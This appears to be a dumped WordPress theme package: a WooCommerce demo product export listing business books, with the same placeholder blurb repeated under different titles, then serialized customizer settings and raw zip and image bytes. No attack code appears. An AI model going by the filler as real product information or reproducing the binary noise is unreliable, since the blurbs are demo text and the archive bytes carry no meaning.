		<category domain="product_visibility" nicename="featured"><![CDATA[featured]]></category>
		<category domain="product_tag" nicename="news"><![CDATA[news]]></category>
		<category domain="product_type" nicename="simple"><![CDATA[simple]]></category>
		<category domain="product_tag" nicename="strategy"><![CDATA[strategy]]></category>
						<wp:postmeta>
		<wp:meta_key><![CDATA[_regular_price]]></wp:meta_key>
		<wp:meta_value><![CDATA[59.99]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[total_sales]]></wp:meta_key>
		<wp:meta_value><![CDATA[0]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_tax_status]]></wp:meta_key>
		<wp:meta_value><![CDATA[taxable]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_tax_class]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_manage_stock]]></wp:meta_key>
		<wp:meta_value><![CDATA[no]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_backorders]]></wp:meta_key>
		<wp:meta_value><![CDATA[no]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_sold_individually]]></wp:meta_key>
		<wp:meta_value><![CDATA[no]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_virtual]]></wp:meta_key>
		<wp:meta_value><![CDATA[no]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_downloadable]]></wp:meta_key>
		<wp:meta_value><![CDATA[no]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_download_limit]]></wp:meta_key>
		<wp:meta_value><![CDATA[-1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_download_expiry]]></wp:meta_key>
		<wp:meta_value><![CDATA[-1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_stock]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_stock_status]]></wp:meta_key>
		<wp:meta_value><![CDATA[instock]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wc_average_rating]]></wp:meta_key>
		<wp:meta_value><![CDATA[0]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wc_review_count]]></wp:meta_key>
		<wp:meta_value><![CDATA[0]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_product_version]]></wp:meta_key>
		<wp:meta_value><![CDATA[4.5.2]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_price]]></wp:meta_key>
		<wp:meta_value><![CDATA[59.99]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[slide_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[rs_page_bg_color]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_thumbnail_id]]></wp:meta_key>
		<wp:meta_value><![CDATA[1275]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Introduction to Business</title>
		<link>http://wpdemo.archiwp.com/maxbizz/product/introduction-to-business/</link>
		<pubDate>Thu, 01 Oct 2020 10:36:49 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?post_type=product&#038;p=1192</guid>
		<description></description>
		<content:encoded><![CDATA[A good leader gets things done; a great leader aspires, inspires, and achieves more. This book highlights the differences between good and great, and shows you how to bridge the chasm between getting things done and making things happen.Business is evolving at an increasingly rapid rate, and leaders must keep pace with the changes or risk stagnation. People work differently, are motivated differently, and have different expectations today—business as usual is quickly losing its effectiveness. The Leadership Challenge helps you stay current, relevant, and effective in the modern workplace.
<ul>
 	<li>Gain deep insight into leadership's critical role in organizational health</li>
 	<li>Navigate the shift toward team-oriented work relationships</li>
 	<li>Motivate and inspire to break through the pervasive new cynicism</li>
</ul>]]></content:encoded>
		<excerpt:encoded><![CDATA[This book is the gold-standard manual for effective leadership, grounded in research and written by the premier authorities in the field. With deep insight into the complex interpersonal dynamics of the workplace.

This new sixth edition has been revised to address current challenges, and includes more international examples and a laser focus on business issues; you'll learn how extraordinary leaders accomplish extraordinary things.]]></excerpt:encoded>
		<wp:post_id>1192</wp:post_id>
		<wp:post_date><![CDATA[2020-10-01 10:36:49]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-10-01 10:36:49]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[introduction-to-business]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[product]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
										<category domain="product_cat" nicename="business"><![CDATA[Business]]></category>
		<category domain="product_tag" nicename="business"><![CDATA[business]]></category>
		<category domain="product_tag" nicename="finance"><![CDATA[finance]]></category>
		<category domain="product_cat" nicename="marketing"><![CDATA[Marketing]]></category>
		<category domain="product_type" nicename="simple"><![CDATA[simple]]></category>
						<wp:postmeta>
		<wp:meta_key><![CDATA[_regular_price]]></wp:meta_key>
		<wp:meta_value><![CDATA[59.99]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[total_sales]]></wp:meta_key>
		<wp:meta_value><![CDATA[0]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_tax_status]]></wp:meta_key>
		<wp:meta_value><![CDATA[taxable]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_tax_class]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_manage_stock]]></wp:meta_key>
		<wp:meta_value><![CDATA[no]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_backorders]]></wp:meta_key>
		<wp:meta_value><![CDATA[no]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_sold_individually]]></wp:meta_key>
		<wp:meta_value><![CDATA[no]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_virtual]]></wp:meta_key>
		<wp:meta_value><![CDATA[no]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_downloadable]]></wp:meta_key>
		<wp:meta_value><![CDATA[no]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_download_limit]]></wp:meta_key>
		<wp:meta_value><![CDATA[-1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_download_expiry]]></wp:meta_key>
		<wp:meta_value><![CDATA[-1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_stock]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_stock_status]]></wp:meta_key>
		<wp:meta_value><![CDATA[instock]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wc_average_rating]]></wp:meta_key>
		<wp:meta_value><![CDATA[0]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wc_review_count]]></wp:meta_key>
		<wp:meta_value><![CDATA[0]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_product_version]]></wp:meta_key>
		<wp:meta_value><![CDATA[4.5.2]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_price]]></wp:meta_key>
		<wp:meta_value><![CDATA[39.99]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[slide_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[rs_page_bg_color]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_sale_price]]></wp:meta_key>
		<wp:meta_value><![CDATA[39.99]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_thumbnail_id]]></wp:meta_key>
		<wp:meta_value><![CDATA[1274]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>System Analytic</title>
		<link>http://wpdemo.archiwp.com/maxbizz/product/system-analytic/</link>
		<pubDate>Thu, 01 Oct 2020 10:37:28 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?post_type=product&#038;p=1194</guid>
		<description></description>
		<content:encoded><![CDATA[A good leader gets things done; a great leader aspires, inspires, and achieves more. This book highlights the differences between good and great, and shows you how to bridge the chasm between getting things done and making things happen.Business is evolving at an increasingly rapid rate, and leaders must keep pace with the changes or risk stagnation. People work differently, are motivated differently, and have different expectations today—business as usual is quickly losing its effectiveness. The Leadership Challenge helps you stay current, relevant, and effective in the modern workplace.
<ul>
 	<li>Gain deep insight into leadership's critical role in organizational health</li>
 	<li>Navigate the shift toward team-oriented work relationships</li>
 	<li>Motivate and inspire to break through the pervasive new cynicism</li>
</ul>]]></content:encoded>
		<excerpt:encoded><![CDATA[This book is the gold-standard manual for effective leadership, grounded in research and written by the premier authorities in the field. With deep insight into the complex interpersonal dynamics of the workplace.

This new sixth edition has been revised to address current challenges, and includes more international examples and a laser focus on business issues; you'll learn how extraordinary leaders accomplish extraordinary things.]]></excerpt:encoded>
		<wp:post_id>1194</wp:post_id>
		<wp:post_date><![CDATA[2020-10-01 10:37:28]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-10-01 10:37:28]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[system-analytic]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[product]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
										<category domain="product_tag" nicename="analysis"><![CDATA[analysis]]></category>
		<category domain="product_cat" nicename="consulting"><![CDATA[Consulting]]></category>
		<category domain="product_tag" nicename="consulting"><![CDATA[consulting]]></category>
		<category domain="product_cat" nicename="marketing"><![CDATA[Marketing]]></category>
		<category domain="product_type" nicename="simple"><![CDATA[simple]]></category>
		<category domain="product_tag" nicename="trading"><![CDATA[trading]]></category>
						<wp:postmeta>
		<wp:meta_key><![CDATA[_regular_price]]></wp:meta_key>
		<wp:meta_value><![CDATA[29.99]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[total_sales]]></wp:meta_key>
		<wp:meta_value><![CDATA[0]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_tax_status]]></wp:meta_key>
		<wp:meta_value><![CDATA[taxable]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_tax_class]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_manage_stock]]></wp:meta_key>
		<wp:meta_value><![CDATA[no]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_backorders]]></wp:meta_key>
		<wp:meta_value><![CDATA[no]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_sold_individually]]></wp:meta_key>
		<wp:meta_value><![CDATA[no]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_virtual]]></wp:meta_key>
		<wp:meta_value><![CDATA[no]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_downloadable]]></wp:meta_key>
		<wp:meta_value><![CDATA[no]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_download_limit]]></wp:meta_key>
		<wp:meta_value><![CDATA[-1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_download_expiry]]></wp:meta_key>
		<wp:meta_value><![CDATA[-1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_stock]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_stock_status]]></wp:meta_key>
		<wp:meta_value><![CDATA[instock]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wc_average_rating]]></wp:meta_key>
		<wp:meta_value><![CDATA[0]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wc_review_count]]></wp:meta_key>
		<wp:meta_value><![CDATA[0]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_product_version]]></wp:meta_key>
		<wp:meta_value><![CDATA[4.5.2]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_price]]></wp:meta_key>
		<wp:meta_value><![CDATA[29.99]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[slide_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[rs_page_bg_color]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_thumbnail_id]]></wp:meta_key>
		<wp:meta_value><![CDATA[1273]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Finance for Business</title>
		<link>http://wpdemo.archiwp.com/maxbizz/product/finance-for-business/</link>
		<pubDate>Thu, 01 Oct 2020 10:44:48 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?post_type=product&#038;p=1198</guid>
		<description></description>
		<content:encoded><![CDATA[A good leader gets things done; a great leader aspires, inspires, and achieves more. This book highlights the differences between good and great, and shows you how to bridge the chasm between getting things done and making things happen.Business is evolving at an increasingly rapid rate, and leaders must keep pace with the changes or risk stagnation. People work differently, are motivated differently, and have different expectations today—business as usual is quickly losing its effectiveness. The Leadership Challenge helps you stay current, relevant, and effective in the modern workplace.
<ul>
 	<li>Gain deep insight into leadership's critical role in organizational health</li>
 	<li>Navigate the shift toward team-oriented work relationships</li>
 	<li>Motivate and inspire to break through the pervasive new cynicism</li>
</ul>]]></content:encoded>
		<excerpt:encoded><![CDATA[This book is the gold-standard manual for effective leadership, grounded in research and written by the premier authorities in the field. With deep insight into the complex interpersonal dynamics of the workplace.

This new sixth edition has been revised to address current challenges, and includes more international examples and a laser focus on business issues; you'll learn how extraordinary leaders accomplish extraordinary things.]]></excerpt:encoded>
		<wp:post_id>1198</wp:post_id>
		<wp:post_date><![CDATA[2020-10-01 10:44:48]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-10-01 10:44:48]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[finance-for-business]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[product]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
										<category domain="product_tag" nicename="business"><![CDATA[business]]></category>
		<category domain="product_cat" nicename="finance"><![CDATA[Finance]]></category>
		<category domain="product_type" nicename="simple"><![CDATA[simple]]></category>
		<category domain="product_tag" nicename="tips"><![CDATA[tips]]></category>
						<wp:postmeta>
		<wp:meta_key><![CDATA[_regular_price]]></wp:meta_key>
		<wp:meta_value><![CDATA[39.99]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[total_sales]]></wp:meta_key>
		<wp:meta_value><![CDATA[0]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_tax_status]]></wp:meta_key>
		<wp:meta_value><![CDATA[taxable]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_tax_class]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_manage_stock]]></wp:meta_key>
		<wp:meta_value><![CDATA[no]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_backorders]]></wp:meta_key>
		<wp:meta_value><![CDATA[no]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_sold_individually]]></wp:meta_key>
		<wp:meta_value><![CDATA[no]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_virtual]]></wp:meta_key>
		<wp:meta_value><![CDATA[no]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_downloadable]]></wp:meta_key>
		<wp:meta_value><![CDATA[no]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_download_limit]]></wp:meta_key>
		<wp:meta_value><![CDATA[-1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_download_expiry]]></wp:meta_key>
		<wp:meta_value><![CDATA[-1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_stock]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_stock_status]]></wp:meta_key>
		<wp:meta_value><![CDATA[instock]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wc_average_rating]]></wp:meta_key>
		<wp:meta_value><![CDATA[0]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wc_review_count]]></wp:meta_key>
		<wp:meta_value><![CDATA[0]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_product_version]]></wp:meta_key>
		<wp:meta_value><![CDATA[4.5.2]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_price]]></wp:meta_key>
		<wp:meta_value><![CDATA[39.99]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[slide_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[rs_page_bg_color]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_thumbnail_id]]></wp:meta_key>
		<wp:meta_value><![CDATA[1272]]></wp:meta_value>
		</wp:postmeta>
							</item>
				</channel>
</rss>
	PK�8FZQ����$inc/backend/data/main/customizer.datnu�[���a:4:{s:8:"template";s:7:"maxbizz";s:4:"mods";a:21:{i:0;b:0;s:18:"nav_menu_locations";a:0:{}s:18:"custom_css_post_id";i:1210;s:13:"footer_layout";s:3:"300";s:13:"header_layout";s:1:"7";s:13:"header_mobile";s:2:"77";s:16:"sidepanel_layout";s:3:"253";s:12:"post_socials";a:4:{i:0;s:4:"twit";i:1;s:4:"face";i:2;s:4:"pint";i:3;s:6:"google";}s:7:"preload";b:1;s:11:"shop_layout";s:15:"sidebar-content";s:18:"single_shop_layout";s:12:"full-content";s:11:"pheader_img";s:85:"http://wpdemo.archiwp.com/maxbizz/wp-content/uploads/sites/7/2020/09/pheader-blog.jpg";s:12:"footer_fixed";b:0;s:9:"body_typo";a:9:{s:11:"font-family";s:0:"";s:7:"variant";s:0:"";s:9:"font-size";s:0:"";s:11:"line-height";s:0:"";s:14:"letter-spacing";s:0:"";s:14:"text-transform";s:0:"";s:11:"font-backup";s:0:"";s:11:"font-weight";i:0;s:10:"font-style";s:0:"";}s:11:"second_font";a:5:{s:11:"font-family";s:0:"";s:11:"font-backup";s:0:"";s:7:"variant";s:0:"";s:11:"font-weight";i:0;s:10:"font-style";s:0:"";}s:13:"heading1_typo";a:9:{s:11:"font-family";s:0:"";s:7:"variant";s:0:"";s:9:"font-size";s:0:"";s:11:"line-height";s:0:"";s:14:"letter-spacing";s:0:"";s:14:"text-transform";s:0:"";s:11:"font-backup";s:0:"";s:11:"font-weight";i:0;s:10:"font-style";s:0:"";}s:13:"heading2_typo";a:9:{s:11:"font-family";s:0:"";s:7:"variant";s:0:"";s:9:"font-size";s:0:"";s:11:"line-height";s:0:"";s:14:"letter-spacing";s:0:"";s:14:"text-transform";s:0:"";s:11:"font-backup";s:0:"";s:11:"font-weight";i:0;s:10:"font-style";s:0:"";}s:13:"heading3_typo";a:9:{s:11:"font-family";s:0:"";s:7:"variant";s:0:"";s:9:"font-size";s:0:"";s:11:"line-height";s:0:"";s:14:"letter-spacing";s:0:"";s:14:"text-transform";s:0:"";s:11:"font-backup";s:0:"";s:11:"font-weight";i:0;s:10:"font-style";s:0:"";}s:13:"heading4_typo";a:9:{s:11:"font-family";s:0:"";s:7:"variant";s:0:"";s:9:"font-size";s:0:"";s:11:"line-height";s:0:"";s:14:"letter-spacing";s:0:"";s:14:"text-transform";s:0:"";s:11:"font-backup";s:0:"";s:11:"font-weight";i:0;s:10:"font-style";s:0:"";}s:13:"heading5_typo";a:9:{s:11:"font-family";s:0:"";s:7:"variant";s:0:"";s:9:"font-size";s:0:"";s:11:"line-height";s:0:"";s:14:"letter-spacing";s:0:"";s:14:"text-transform";s:0:"";s:11:"font-backup";s:0:"";s:11:"font-weight";i:0;s:10:"font-style";s:0:"";}s:13:"heading6_typo";a:9:{s:11:"font-family";s:0:"";s:7:"variant";s:0:"";s:9:"font-size";s:0:"";s:11:"line-height";s:0:"";s:14:"letter-spacing";s:0:"";s:14:"text-transform";s:0:"";s:11:"font-backup";s:0:"";s:11:"font-weight";i:0;s:10:"font-style";s:0:"";}}s:7:"options";a:22:{s:22:"woocommerce_demo_store";s:2:"no";s:29:"woocommerce_demo_store_notice";s:79:"This is a demo store for testing purposes &mdash; no orders shall be fulfilled.";s:29:"woocommerce_shop_page_display";s:0:"";s:36:"woocommerce_category_archive_display";s:0:"";s:35:"woocommerce_default_catalog_orderby";s:4:"date";s:27:"woocommerce_catalog_columns";s:1:"3";s:24:"woocommerce_catalog_rows";s:1:"3";s:30:"woocommerce_single_image_width";s:3:"600";s:33:"woocommerce_thumbnail_image_width";s:3:"300";s:30:"woocommerce_thumbnail_cropping";s:9:"uncropped";s:43:"woocommerce_thumbnail_cropping_custom_width";s:1:"4";s:44:"woocommerce_thumbnail_cropping_custom_height";s:1:"3";s:34:"woocommerce_checkout_company_field";s:8:"optional";s:36:"woocommerce_checkout_address_2_field";s:8:"optional";s:32:"woocommerce_checkout_phone_field";s:8:"required";s:46:"woocommerce_checkout_highlight_required_fields";s:3:"yes";s:55:"woocommerce_checkout_terms_and_conditions_checkbox_text";s:44:"I have read and agree to the website [terms]";s:40:"woocommerce_checkout_privacy_policy_text";s:161:"Your personal data will be used to process your order, support your experience throughout this website, and for other purposes described in our [privacy_policy].";s:26:"wp_page_for_privacy_policy";s:1:"0";s:25:"woocommerce_terms_page_id";s:0:"";s:9:"site_icon";s:3:"937";s:23:"nav_menus_created_posts";a:0:{}}s:6:"wp_css";s:46:".post-box .post-inner{
	margin-bottom: 30px;
}";}PK�8FZș*xx!inc/backend/data/main/sliders.zipnu�[���PK
���Qsliders/PK�n�Q�v2_J
<sliders/slider-1.zip��PKy��Q�FZb��<�images/2020/12/slide1.jpg��TS�6�&1pBQCL<��K
���$�zR`@z���CK͂��@�"���T8����/�;��7��#�����^k�g>�;��Y��[��n��'`h(����?:a�~� �y����wh�-��b Q��#ȍ����zKQI�"�ʵ�[��~�P���'PKr���$��CK�V����o����(3+�(?wM�kW�W"������@":BK�ߝ�9�7+J�m�%���
8��~=(�WSPG�+�*�54��/j*�"���4/j(*��.*�/��U4�Hr��ቶ���cq^iI�������U�B��455/*+*+�8-P��P�T ��A�@t������-(,TKR��p�w���V�GCS����ۚjI�oM���EP�$��B�	���w���Bp

�

�+�{���n��_�m�Kp[�@��p��}LMц��P�@w����$g����ZEY]G]GCSE󢒒�.V���ޥKXU=eM�Kʪ��W'�=,��?}=����׾���_�	!>�	z!A�������E�>�����˥�k_E�`����?�8������_�9��@�?��M
�x�	!�1��1n��"͠�� ���������?8�<������rB��'~�0��§O�ϝ;?����<~�,vVBDPD���� �T��;�JxL���t�Y��� �10��-�_A�w�x�u����,:��ላ%�S�.\���o�`���㮫
Kp��y��@�\�c@��J�0�`�c��ʎ��XK���n��1�.!�g3_r�Ϋ�t�N�
�z7+ȵW�&u�>[����cT�'�������>�ߣ����9���O1�o�������3
��1N���&U(o<��$
zRz`�!i@]�V@��
�����
�-�����ly�#$i����`�$����	qy0X�RU���@k^>���eh���T�x16�J�ԗ;���c�	u
xq�mB�t`�?��ѻ��}�O���}��@<]yYrc����Ȟ�(��wM5�?L��*z!�n��BIɘ9"�uw�Y�e“���K@�3:(	~�\A��H!@IUʚ��!��.9���`YO-9�)}��:�+�W
 �-�XW�)/[{��/�
����T�V�ͅIX�f�ŕwLs?�w�J���Ь&tKQ��T��otz���\��{z؃

�$��Ļ�7n6u]��r�%`YEnd�������Mmj�Hn�,5�V@��+���&����n�}�NH8OXGX����3,�&�������/n$OULt2<���4#_�2Gqw�q�c����丏@�.j��P0XЅ�}ג��{��-�. �g��cټ&]na�v7y�/��;�s�B�[��/�~�څܕ��!+�F�>b�%7�Y�zfI�<P��)@�UM�o�`���f�M�f�~P��b
�0P��ʳ�,�M�sF���28�9� ����54�J���@��ϧOt_h+����G���=-�GO�,�1�1.�x^�������@S1�fI>ψ�G������`�dy� >�i#i�D��T\��
�ˀD�s��	GY��Us�����І��]sM2���\��U]�M�k-+[p告�S�޻��٢��v�����b���R�l.����
N�wMPq�`���!��N#4_�J
��� !x, #�{􇏨���ϰ����8z�+�^�OSK�րWSH
"g��҆�1 (��=|j�/r^� �ç�=|o��@���ɀ�h��nry�}��w���1�V��إZW����A˫�FFKBm�K�>+-�{��o�W��v�&��D�7`�d�j�aܨ���vl�+�5��C�ӫ�nPҍr��5(��W~h6@xMk�I;���6X�g���C`�pL�b��-����X�a|�Q�
ɔkI���Zsk�l�"� �+%��&A X0j�,�/N[߽	��qM�`�j��E2�bnPs��d6��I�$}��xe�獫�k���}-^*�Ψ4Kz�aY]����W��N���d)�o��$�U������I�dn��}kc�5�Z%j]T5�.,�o��n��@ɜ&91�F�hy���S�I>��l;=�CÙ1VG&y�$�WeF���lTǃ�!�g�ԫ>M
f���۴=��V!�0�J��2��T�����F��D:��<4|0H��NjH��+���}��&m�ˁ��F�(�
y��H�gO�ɢ�!L�F	�����ω��X�8��b�zb.J-:��d.�a@��Fk��7
s���&�&C7��ϟXA>�Q|������
8q��ΕE�� 
���*>���gIX%�qVa�t���fF�S�F���쉺Ї�Ŗ�rk0�L���Xh\25��|n	��`�qm�D�Y�.��B���`]��}���UJZV�h�k(��+ԗ���\d��ۖnMP�m�0�
:�7G��MrYN��6{B���[Lv�?�2�~���JGp���̽d�	�s��z֞
Uc<��~s��k$�ra��#�5�s�,[t�=�JM�-�,+*0:
